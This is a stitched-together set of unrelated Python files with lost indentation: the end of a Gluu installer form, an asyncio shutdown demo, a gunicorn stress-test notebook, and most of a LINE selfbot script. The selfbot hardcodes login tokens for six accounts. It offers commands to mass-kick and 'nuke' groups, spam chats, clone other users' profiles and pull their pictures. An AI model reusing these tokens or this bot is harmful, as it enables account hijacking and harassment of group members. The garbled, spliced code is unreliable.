npyscreen.notify_confirm(msg.installation_completed.format(self.parentApp.installObject.hostname), title="Completed")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
elif data[0] == ERROR:
npyscreen.notify_confirm(msg.installation_error +"\n"+data[2], title="ERROR")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
            self.progress_percentage.value = data[0]
            self.progress_percentage.update()
self.installing.value = data[2]
self.installing.update()
if self.desc_value != data[1]:
if hasattr(msg, 'installation_description_' + data[1]):
desc = getattr(msg, 'installation_description_' + data[1])
else:
desc = msg.installation_description_gluu
self.description.value = '\n'.join(textwrap.wrap(desc, self.columns - 10))
self.description.update()
self.desc_value = data[1]
def backButtonPressed(self):
pass
def nextButtonPressed(self):
pass
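# --- Illustrative sketch (editor's addition, not part of the installer) ---
# InstallStepsForm runs the installation on a daemon thread and polls the module-level
# `queue` from do_while_waiting(), so the curses UI never blocks. The standalone
# producer/consumer below shows the same pattern with made-up step names; the real
# installer puts (progress, step_key, status_text) tuples and a final COMPLETED marker.
# This demo is never called by the installer.
def _progress_queue_demo():
    demo_queue = Queue()
    def worker():
        for i, step in enumerate(("configure", "install", "finalize"), start=1):
            time.sleep(0.1)  # stand-in for real installation work
            demo_queue.put((i, step, "doing " + step))
        demo_queue.put((COMPLETED, "", "done"))
    t = threading.Thread(target=worker)
    t.daemon = True
    t.start()
    while True:
        code, step, label = demo_queue.get()
        if code == COMPLETED:
            break
        print("step %s: %s" % (code, label))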
|
asyncfin-v1.py
|
"""
Correct tasks finalization. Variant 1. Do it by SIGTERM interception.
"""
import asyncio
import multiprocessing
import random
import signal
import time
class Client(object):
def __init__(self):
self.running = True
async def test(self, i):
while self.running:
val = random.randint(0, 4)
print ("Do work. thread: {0}, timeout: {1}".format(i, val))
await asyncio.sleep(val)
print ("End of thread: {0}".format(i))
async def waiter(self):
        tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task()]
await asyncio.gather(*tasks)
self.loop.remove_signal_handler(signal.SIGTERM)
self.loop.stop()
def sigterm_handler(self):
print("Catch SIGTERM")
self.running = False
self.loop.create_task(self.waiter())
def run(self):
self.loop = asyncio.get_event_loop()
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm_handler)
for j in range(3):
self.loop.create_task(self.test(j))
try:
self.loop.run_forever()
finally:
print("Finally section")
self.loop.close()
def bgrun(self):
evloop_process = multiprocessing.Process(target=self.run, args=())
evloop_process.start()
time.sleep(4)
evloop_process.terminate()
evloop_process.join()
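# --- Illustrative variant (editor's addition) ---
# The same graceful-shutdown idea expressed with the non-deprecated asyncio API: a SIGTERM
# handler flips a shared flag and main() simply awaits all workers. This is a sketch only
# and is not executed by this module.
async def _worker_variant(i, state):
    while state["running"]:
        await asyncio.sleep(random.randint(0, 4))
    print("End of worker: {0}".format(i))
async def _main_variant():
    state = {"running": True}
    loop = asyncio.get_running_loop()
    loop.add_signal_handler(signal.SIGTERM, lambda: state.update(running=False))
    await asyncio.gather(*(_worker_variant(j, state) for j in range(3)))
# To try it: asyncio.run(_main_variant()) and then send SIGTERM to the process.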
client = Client()
client.bgrun()
|
comparison-request-gunicorn-dynamic.py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import os
import threading
from queue import Queue
import requests
# In[2]:
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [threading.Thread(target=task_wrapper, args=args) for args in args_list]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
def get_time(text, type_api, i):
response = str(requests.get("http://192.168.0.102:8033/%s?text=%s" % (type_api, text)).content)
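    # str(bytes) yields "b'...'", which is why callers slice the result with [2:-1] to recover the raw text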
return [response, i]
# # Stress test 50 requests concurrently on dynamic graph, when worker = 1
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 1
# ```
# In[10]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 2
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 2
# ```
# In[12]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 5
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 5
# ```
# In[13]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 7
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 7
# ```
# In[14]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 10
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 10
# ```
# In[15]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# In[ ]:
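# --- Illustrative alternative (editor's addition) ---
# The same fan-out/fan-in can be written with concurrent.futures, which does the thread and
# queue bookkeeping of run_parallel_in_threads for us. Same endpoint and payload assumptions
# as the cells above; this is a sketch only and is not used by the benchmark.
def run_parallel_with_executor(target, args_list, max_workers=None):
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        results = [future.result() for future in [pool.submit(target, *args) for args in args_list]]
    return [r for r in results if r is not None]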
|
6.py
|
# -*- coding: utf-8 -*-
import LINETCR
#import wikipedia
from LINETCR.lib.curve.ttypes import *
#from ASUL.lib.curve.ttypes import *
from datetime import datetime
# https://kaijento.github.io/2017/05/19/web-scraping-youtube.com/
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
cl =LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EpEWkrCNDdyEx47avxn8.6S7B6iV24SxpyyIZPkjUga.NthYU32DNc7TNeBhhNe53dXfFAzJivL/c7yfHIojY5E=')
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token='EpwCveO27uLkj5RABiZ9.Z2jqcI8fppmz+7xOGNlyEq.f4LsQDRQ89mvEI6kk7Ymzk1sPJsArDQRU9v6DIYWlvA=')
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='Ep5x39yHINyEEVb7eaYa.Ql+Iq95c4olkmxSaoadLoG.guCtCeFRGAxadoTr/JxRhLsDyLTeTNTj285/W6Moadw=')
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='Epezl3XFYfIArh9F82x6.SGby4XQI1gAOTET1lBqQ9G.Kha8WacxePkq1eck0Kaxb83kSJ4odJGyVV9aMSvEspI=')
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token='EpUfPCc0QdIkGkErgJca.Q6+YE7DHLRb+4/UXmbKggG.LJL7TYkXyf5UpTvXGKBFSmyYPQJAz9cgbzl5bsKJBJI=')
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token='Epyyzy4CVbNqz8DSept8.7fLTCfOW6V77bikOdoT16a.QFITEuKTLXnmPlJ6XX43+Oe3oF3jKsLCE4JFL/mwOcA=')
ki5.loginResult()
cl
#ki6 = ASUL.LINE()
#AsulLogged = False
#cl = ASUL.LINE()
#cl.login(token='EoChmq5TXM73ZRg9P8ec.YLgVP2FFH7O3buLlL8m1xa.53z2MiS/devknmPfbJjsBhLEqtWnv6cUujv6wklIJsc')
#cl.loginResult()
print u"login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" .‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜ •°✿*゚
||=====คำสั่งทั่วไป=====||
➣ [Me @]➣ดูคอนแทคเพื่อน
➣ [Tr-th]➣แปลเป็นไทย
➣ [Tr-en]➣แปลเป็นอังกฤษ
➣ [Ginfo]➣ดูข้อมูลกลุ่ม
➣ [Glist]➣ส่งของขวัญ
➣ [Cancel]➣ยกเลิกเชิน
➣ [Mid @]➣ดูเอมไอดีเพื่อน
➣ [Invite]➣เชินตามคอนแทค
➣ [Invite: ]➣เชินด้วยเอมไอดี
➣ [Whitelist @]
➣ [Whitelist:
➣ [Whitelist
➣ [Blacklist @
➣ [Blacklist:
➣ [Blacklist
➣ [Clear ban]เชคแบนโชว์คอนแทค
➣ [Link on]☆เปิดลิ้ง
➣ [Link off]☆ปิดลิ้ง
➣ [Gurl]
➣ [Url ]➣ลิ้งกลุ่ม
➣ [Gname]
➣ [Banlist ]
➣ [Details grup]
➣ [Inviteme:]
➣ [Info grup]
➣ [Gift-Allgift]➣ [ส่งของขวัญ-ทั้งหมด
➣ [Clear grup]
➣️ [Reject]☆ลบรันตัวเอง
➣ [Mic:]☆เชคคอนแทค
➣️ [Reject1]➣ [ลบรันคิกเก้อ
➣ [Nuke]☆ล้างห้อง
➣ [Mention,Tagall]➣แทคทั้งห้อง
➣ [Kick @ เตะ]
➣ [Kick:
➣ [Bc:ct]
➣ [Bc:grup]
➣ [Block @]
➣ [Youtube]➣ยูทูป
➣ [vdo]
➣ [Blocklist]
➣ [Spam on/off]➣รันข้อความแชท
➣ [ไวรัส01]
➣ [Bot:ct ]
➣ [Bot:grup.]
➣ [Allname:]
➣ [Allbio:]
➣ [Gc]☆ดูผู้สร้างห้อง
➣ [Speed]☆สปีดบอท
➣ [Conban]➣เชคแบน
➣ [Mycopy @] ➣ก้อปปี้โปรไฟล์
➣ [Copy1 @]
➣ [Copy2 @]
➣ [Copy3 @]
➣ [Copy4 @]
➣ [Copy5 @]
➣ [Mybackup @ ]➣กลับคืนค่าก้อปปี้
➣ [Like:on/off] ➣ออโต้ไลค์ เปิด/ปิด
➣ [Add on/off] ➣ออโต้แอด เปิด/ปิด
➣ [Join on/off]➣ออโต้เข้ากลุ่ม เปิด/ปิด
➣ [Contact on/off]➣อ่านคอนแทค เปิด/ปิด
➣ [Leave on/off] ➣ออโต้ออกแชทรวม เปิด/ปิด
➣ [Share on/off]➣โชว์ลิ้งโพส เปิด/ปิด
➣ [Getname @]➣เชคชื่อเพื่อน
➣ [Getbio @]➣
➣ [Getprofile @]➣เชคเสตัสเพื่อน
➣ [Jam on/off]➣
➣ [Jam say:]
➣ [Com on/off]
➣ [Message set:]
➣ [Comment set:]
➣ [Pesan add:]
||===== P R O T E C T =====||
➣ [Panick:on/off]
➣ [Allprotect on/off]➣ล้อกทั้งหมด เปิด/ปิด
➣ [Protect on]☆ป้องกันเปิด/ปิด
➣ [Qrprotect on/off]☆ล้อกคิวอารโค้ตเปิด/ปิด
➣ [Inviteprotect on/off]☆เชินเปิด/ปิด
➣ [Cancelprotect on/off]ยกเชินเปิด/ปิด
➣[Staff add/remove @]➣ เพิ่มแอด/ลบแอด
||======= FOR ADMIN =======||
‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜
line.me/ti/p/4bvwOIMft8
||========================||
"""
help2Message =""". ‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜ •°✿*゚
===✒️ ชุดคำสั่งAsul Bot ✒️ ===
||✒️ คท - ส่งคท.ตัวเอง(Me)
||✒️ ไอดี - ส่งMidตัวเอง
||✒️ คิกเกอร์ - เชคคท.คิกเกอร์ทั้งหมด
||✒️ คิกมา - เรียกคิกเกอร์เข้ากลุ่ม
||✒️ คิกออก - สั่งคิกเกอร์ออกกลุ่ม
||✒️ แทค - แทคสมาชิก
||✒️ จุด - ตั้งจุดเชคคนอ่าน
||✒️ อ่าน - เชครายชื่อคนอ่าน
||✒️ เชคกลุ่ม - เชคข้อมูลกลุ่ม
||✒️ ลิสกลุ่ม - เชคกลุ่มที่มีทั้งหมด
||✒️ ยกเชิญ,ยก - ยกเลิกเชิญ
||✒️ Mid @ - เชคMidรายบุคคล
||✒️ ดึง - เชิญคนเข้ากลุ่มด้วยคท.
||✒️ ดึง: - เชิญคนเข้ากลุ่ม้ดวยMid
||✒️ ขาว - แก้ดำ(ส่งคท.)
||✒️ ดำ - เพิ่มบัญชีดำ(ส่งคท.)
||✒️ เชคดำ - เชคบัญชีดำ
||✒️ ล้างดำ - ล้างบัญชีดำ
||✒️ เปิดลิ้ง
||✒️ ปิดลิ้ง
||✒️ ลิ้ง - เปิดและขอลิ้งกลุ่ม
||✒️ Gname: - เปลี่ยนชื่อกลุ่ม
||✒️ ลบรัน - ลบรันตัวเอง
||✒️ ลบรัน1 - ลบรันให้เพื่อน(ขอลิ้งให้ลอคอินก่อน)
||✒️ ขอลิ้ง - ขอลิ้งให้เพื่อนลอคอิน
||✒️ . - เชคสถานะลอคอิน
||✒️ Sp - เชคสปีด
||✒️ Bot sp - เชคสปีดคิกเกอร์
||✒️ Mycopy @ - กอพปี้โปรไฟล์
||✒️ Copy @ - คิกเกอร์1กอพปี้
||✒️ Mybackup - กลับร่างเดิม
||✒️ Backup - คิกเกอร์1กลับร่างเดิม
||✒️ Spam on/off - ส่งข้อความสแปม
||==============================||
✯★Creator By ‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜ •°✿*゚
line.me/ti/p/4bvwOIMft8
"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
bot1 = cl.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
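# Access control and bot roster: "admin"/"admsa" hold the single mid allowed to
# run privileged commands (kick, invite, protection and staff management), and
# Bots lists the mids of every logged-in account so handlers such as "Ratakan"
# can skip them when kicking.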
admsa = "ueacedbe88bf6e2c5cf6188b3a4a26e18"
admin = "ueacedbe88bf6e2c5cf6188b3a4a26e18"
staff = []  # staff mids managed by the "Add staff @"/"Remove staff @" commands below (assumed to start empty; no earlier definition appears in this part of the script)
wait = {
'contact':True,
'autoJoin':False,
'autoCancel':{"on":False,"members":50},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"self bot by= -[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-",
"lang":"JP",
"comment":"Auto Like By = -[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]- ",
"welmsg":"welcome to group",
"commentOn":False,
"likeOn":False,
"commentBlack":{},
"wblack":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"dblack":False,
"clock":False,
"cName":"",
"sambut":False,
"welcomemsg":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
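# wait2 keeps per-group read-point state for the "Point"/"Read" commands:
# readPoint stores the checkpoint message id, readMember accumulates active
# readers, ROM holds passive readers and setTime records when the point was set.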
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
"ricoinvite":{},
'ROM':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = mimic  # the Mimic handlers below refer to this dict as wait3
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
user1 = mid
user2 = ""
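# cms() is a small helper meant to match a message against a list of commands
# with any of the accepted prefix characters (e.g. "/help", ">help"); note that
# it is not referenced in this part of the script.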
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string == texX + command:
return True
return False
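# bot(op) is the main operation dispatcher. The op.type values handled below are:
#   13    - invited into a group (auto-join, auto-cancel, blacklist filtering)
#   19    - the account was kicked; the kicker is added to the blacklist
#   22/24 - invited into a chat room (auto-leave when leaveRoom is on)
#   15/17 - a member left / joined a group (farewell and welcome notices)
#   25/26 - message events; the long elif chain of text commands lives here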
def bot(op):
global AsulLogged
global ki6
global user2
global readAlert
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',')  # mids in op.param3 are separated by the 0x1e record separator (assumption based on common LINE op payloads)
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "ueacedbe88bf6e2c5cf6188b3a4a26e18":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
#------------------------
# if 'MENTION' in msg.contentMetadata.keys() != None:
# if wait["detectMention"] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["แท็กทำไม",cName + " ฝากข้อความไว้นะครับ"]
# ret_ = "[ข้อความอัตโนมัติ] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata['MENTION'])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# break
# if 'MENTION' in msg.contentMetadata.keys() != None:
# if wait["detectMention"] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["จะแท็กทำไมมากมาย-กูเล่นเกมอยู่",cName + ""]
# ret_ = "[ข้อความอัตโนมัติ] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata['MENTION'])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# msg.contentType = 7
# msg.text = ''
# msg.contentMetadata = {
# 'STKPKGID': '608',
# 'STKTXT': '[]',
# 'STKVER': '16',
# 'STKID':'5507'
# }
# cl.sendMessage(msg)
# break
#
# if 'MENTION' in msg.contentMetadata.keys() != None:
# if wait["kickMention"] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["Dont Tag Me!! Im Busy",cName + " Ngapain Ngetag?",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja","-_-","Alin lagi off", cName + " Kenapa Tag saya?","SPAM PC aja " + cName, "Jangan Suka Tag gua " + cName, "Kamu siapa " + cName + "?", "Ada Perlu apa " + cName + "?","Tenggelamkan tuh yang suka tag pake BOT","Tersummon -_-"]
# ret_ = "[Auto Respond] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata['MENTION'])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# cl.kickoutFromGroup(msg.to,[msg.from_])
# break
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait["sambut"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(op.param1,"(\__/) ||\n(•ㅅ•) ||\n/ づ\nʕ•̫͡•ʔ•̫͡•ʔ █▬█ █•̫͡•ʕ•̫͡•ʔ \n" + cl.getContact(op.param2).displayName + "\nยินต้อนรับสู่🔜\n " + str(ginfo.name) + "\n🍂มาใหม่แนะนำตัวด้วยนะ🍂\n" + "\nʕ•̫͡•ʔ•̫͡•ʕ•̫͡•ʔ")
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER OUT GROUP
if op.type == 15:
if op.param2 in bot1:
return
cl.sendText(op.param1,"ไปสะล่ะ ไว้เจอกันใหม่น่ะ @ " + cl.getContact(op.param2).displayName + " ลาก่อน\n~(^з^)-♡\n\n😍-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-😍")
print ("MEMBER HAS LEFT THE GROUP")
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if op.param2 in bot1:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "【.╭╮╭╮.\n∵╭═════════════════╮】\n【╭◆┴┴◆╮.│-----ยินดีต้อนรับ------****** │】\n 【│︵ ︵│<.. Good nigt na |】\n 【│ ╰╯ │.╰═════════════════╯】\n 【╰○--○╯.∵▼.∵▼.∵▼.∵▼.@ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\n\n.¸.•´¸.•´¨) ¸.•*¨) \n( ¸.•´ (¸.•´ .•´ \n( ´¸..★/\︽﹨︽﹨︽☆︽\.☆ \n☆. /我 \︽﹨︽﹨︽★︽\° \n☆ │來 ║﹌﹌﹌﹌﹌﹌﹌│.▲\n ★ │簽簽║ 田 ╭┬╮田│◢█◣ \n@ │ 囉║ │││ ◢███◣ \n║╓╥╥☆. ● ●. ╥★╥╥▊╥╥╖\n ╔╩╬╬╬╬. _/█_/█_╔╩╬╬╬╬╬╬╬ \n\n--ขอให้มีความสุขกับบ้านหลังนี้--")
print "MEMBER HAS JOIN THE GROUP"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
#if wait["sambut"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "💟ลิ้งโพสอยู่ด้านล้างน้ะจ้ะ💟\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
#-----------------------------------------------
elif "Me @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("Me @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
#-----------------------------------------------
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
#----------------------------------------------------------
#-----------------------------------------------
elif "Steal dp @" in msg.text:
nama = msg.text.replace("Steal dp @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
midddd = cl.getContact(linedev.mid)
PATH = "http://dl.profile.line-cdn.net/" + midddd.pictureStatus
cl.sendImageWithURL(msg.to,PATH)
#================================================
elif msg.text in ["bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
